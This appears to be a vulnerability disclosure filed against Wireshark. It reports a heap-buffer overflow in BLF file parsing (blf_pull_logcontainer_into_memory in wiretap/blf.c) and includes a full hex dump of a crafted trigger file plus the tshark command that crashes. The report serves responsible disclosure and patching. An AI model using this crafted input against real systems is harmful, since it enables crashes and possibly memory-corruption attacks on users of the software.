**Description:** A heap-buffer overflow vulnerability has been discovered in Wireshark's Binary Logging Format (BLF) file processing. The vulnerability occurs in the `blf_pull_logcontainer_into_memory()` function in the `wiretap/blf.c` file. The vulnerability could be exploited by providing a maliciously crafted BLF file, which could lead to arbitrary code execution. Tested on: Ubuntu 22.04.2 LTS **Details:** The overflow is triggered by a call to memcpy (displayed as __asan_memcpy in the ASAN output), copying 28 bytes into a memory region that is only 15 bytes large. This region was allocated in `blf_pull_logcontainer_into_memory` using `calloc` at `wiretap/blf.c:499`. After the overflow, the program execution continues until it attempts to allocate memory with `malloc` in `wmem_strdup_printf` (as part of error handling), causing a crash with the message `malloc(): corrupted top size`. **Steps to reproduce:** ``` $ xxd -g1 trigger 00000000: 4c 4f 47 47 30 00 00 00 30 30 30 30 30 30 30 30 LOGG0...00000000 00000010: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000 00000020: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000 00000030: 4c 4f 42 4a 10 00 01 00 0f 00 00 00 0a 00 00 00 LOBJ............ 00000040: 02 00 30 30 30 30 30 30 30 30 30 30 30 30 30 30 ..00000000000000 00000050: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000 00000060: 30 30 30 30 30 30 30 30 30 30 30 30 000000000000 $ tshark -r trigger malloc(): corrupted top size Aborted ``` For a more detailed understanding of this vulnerability, I've attached the following files: * **Trigger File**: This is the crafted BLF file that provokes the heap buffer overflow when processed by Wireshark. * **ASAN Output**: AddressSanitizer's (ASAN) report provides additional insight into the memory corruption. * **GDB Backtrace of Tshark**: This backtrace reveals the call sequence leading up to the crash in Wireshark's Tshark utility. * **GDB Backtrace of the Fuzzer** I'd also like to request a CVE ID for this vulnerability. Please let me know if you need any additional information or assistance in addressing this vulnerability. Regards, Huáscar [trigger](/uploads/51a3aee5c1722e25a4c5e705441f17cb/trigger) [ASAN.txt](/uploads/b42bb8e7c5fbda2411b8f6797e51ee5b/ASAN.txt) [GDB_Backtrace_tshark.txt](/uploads/743bd8a61987bd875980095413e3e91e/GDB_Backtrace_tshark.txt) [GDB_Backtrace_fuzzer.txt](/uploads/dd2a3b634ff782865099ca75b5f6eb89/GDB_Backtrace_fuzzer.txt)